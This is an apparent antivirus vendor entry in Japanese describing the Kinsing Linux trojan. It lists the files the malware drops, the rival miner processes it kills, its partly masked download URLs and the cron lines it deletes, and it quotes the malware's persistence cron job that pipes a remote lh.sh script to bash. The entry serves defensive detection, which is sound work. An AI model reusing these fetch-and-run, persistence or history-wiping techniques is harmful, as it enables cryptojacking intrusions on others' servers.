Trojan.SH.KINSING.H
2021年12月12日
プラットフォーム:
Linux
危険度:
ダメージ度:
感染力:
感染確認数:
システムへの影響:
情報漏えい:
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化: なし
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
ファイルサイズ 11,308 bytes
タイプ Other
メモリ常駐 なし
発見日 2021年12月12日
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- If ran as root:
- /etc/kinsing
- If not ran as root, any of the following:
- /tmp/kinsing
- /var/tmp/kinsing
- /dev/shm/kinsing
- /proc/sys/kernel/nmi_watchdog
- /etc/sysctl.conf
他のシステム変更
マルウェアは、以下のファイルを削除します。
- /etc/ld.so.preload
プロセスの終了
マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。
- .git/kthreaddw
- {BLOCKED}.206.105
- {BLOCKED}.87.6
- p8444
- supportxmr
- monero
- kthreaddi
- srv00
- /tmp/.javae/javae
- .javae
- .syna
- .main
- xmm
- solr.sh
- /tmp/.solr/solrd
- /tmp/javac
- /tmp/.go.sh
- /tmp/.x/agetty
- /tmp/.x/kworker
- c3pool
- /tmp/.X11-unix/gitag-ssh
- /tmp/1
- /tmp/okk.sh
- /tmp/gitaly
- /tmp/.x/kworker
- 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
- /tmp/.X11-unix/supervise
- /tmp/.ssh/redis.sh
- zsvc
- pdefenderd
- updatecheckerd
- cruner
- dbused
- bashirc
- meminitsrv
- Process connecting to {BLOCKED}.87.6, no "-"
- Process connecting to 127.0.0.1:52018, no "-"
- Process connecting to {BLOCKED}.218.76:9486, no "-"
- Process connecting to {BLOCKED}.28.216:9486, no "-"
- Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey, or does not have kinsing
- Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
- Process with 16 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
- Process with string "./oka", no grep
- Process with string "postgres: autovacum", no grep
- Process with string "/tmp/sscks", no grep
- Process with string "agetty", no grep
- {BLOCKED}.28.216
- Process found in the following files:
- /tmp/.X11-unix/01
- /tmp/.X11-unix/11
- /tmp/.X11-unix/22
- /tmp/.pg_stat.0
- /tmp/.pg_stat.1
- $HOME/data/./oka.pid
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。
- http://{BLOCKED}158.44/kinsing
- http://{BLOCKED}.158.44/curl-amd64
- http://{BLOCKED}.158.44/libsystem.so
その他
マルウェアは、以下を実行します。
- Delete cron jobs with the following strings:
- /base64/d
- /_cron/d
- /{BLOCKED}.20.181/d
- /update.sh/d
- /logo4/d
- /logo9/d
- /logo0/d
- /logo/d
- /tor2web/d
- /jpg/d
- /png/d
- /tmp/d
- /zmreplchkr/d
- /aliyun.one/d
- /{BLOCKED}.110.66.one/d
- /pastebin/d
- /onion/d
- /lsd.systemten.org/d
- /shuf/d
- /ash/d
- /mr.sh/d
- /{BLOCKED}.10.234/d
- /localhost.xyz/d
- /{BLOCKED}.151.106/d
- /{BLOCKED}.159.106/d
- /github/d
- /bi{BLOCKED}k.com/d
- /xmr.i{BLOCKED}e.com/d
- /{BLOCKED}.10.234/d
- /{BLOCKED}.79.230/d
- /{BLOCKED}.164.83/d
- /newdat.sh/d
- /lib.p{BLOCKED}m.com /d
- /t.a{BLOCKED}.com/d
- /update.sh/d
- /systemd-service.sh/d
- /pg_stat.sh/d
- /sleep/d
- /oka/d
- /linux1213/d
- /#wget/d
- /#curl/d
- /zsvc/d
- /givemexyz/d
- /world/d
- /1.sh/d
- /3.sh/d
- /workers/d
- /oracleservice/d
- Adds the following cron job:
- http://{BLOCKED}.32.198/lh.sh | bash > /dev/null 2>&1
- It installs the following service:
- /lib/systemd/system/bot.service
- It deletes the command history.
- It tries to install curl, wget, cron if they do not exist in the affected system
対応方法
対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 17.248.05
初回 VSAPI パターンリリース日 2021年12月12日
VSAPI OPR パターンバージョン 17.249.00
VSAPI OPR パターンリリース日 2021年12月13日
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.SH.KINSING.H」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください